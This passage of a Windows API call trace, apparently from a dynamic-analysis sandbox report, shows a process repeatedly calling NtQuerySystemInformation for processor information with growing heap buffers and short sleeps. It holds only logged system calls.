NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0244.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0244.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0244.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0244.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0244.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.798] Sleep (dwMilliseconds=0x110) [0244.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0244.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.810] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0244.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0244.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0244.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0244.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0244.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0244.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0244.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.812] Sleep (dwMilliseconds=0x110) [0244.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0244.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0244.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0244.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0244.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0244.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0244.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0244.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0244.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.831] Sleep (dwMilliseconds=0x110) [0244.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0244.841] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.841] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0244.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0244.841] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0244.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0244.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0244.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0244.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0244.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.843] Sleep (dwMilliseconds=0x110) [0244.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0244.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0244.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0244.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0244.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0244.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0244.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0244.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0244.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.879] Sleep (dwMilliseconds=0x110) [0244.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0244.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0244.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0244.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0244.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0244.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0244.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0244.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0244.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.893] Sleep (dwMilliseconds=0x110) [0244.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0244.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0244.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0244.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0244.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0244.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0244.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0244.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0244.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.910] Sleep (dwMilliseconds=0x110) [0244.919] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0244.919] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.919] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0244.919] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0244.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0244.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0244.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0244.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0244.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0244.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.925] Sleep (dwMilliseconds=0x110) [0244.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0244.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0244.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0244.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0244.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0244.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0244.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0244.942] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0244.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.943] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.943] Sleep (dwMilliseconds=0x110) [0244.950] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0244.950] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0244.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0244.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0244.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0244.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0244.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0244.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0244.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.953] Sleep (dwMilliseconds=0x110) [0244.977] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0244.977] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.978] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0244.978] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0244.978] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.978] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0244.979] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0244.979] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.979] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0244.979] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0244.979] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.980] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0244.980] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.980] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.980] Sleep (dwMilliseconds=0x110) [0245.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0245.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0245.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0245.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0245.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0245.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0245.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0245.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0245.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.005] Sleep (dwMilliseconds=0x110) [0245.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0245.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0245.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0245.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0245.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0245.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0245.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0245.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0245.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.016] Sleep (dwMilliseconds=0x110) [0245.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0245.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0245.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0245.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0245.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0245.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0245.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0245.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0245.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.031] Sleep (dwMilliseconds=0x110) [0245.044] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0245.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.045] HeapFree (in: hHeap=0x2560000, 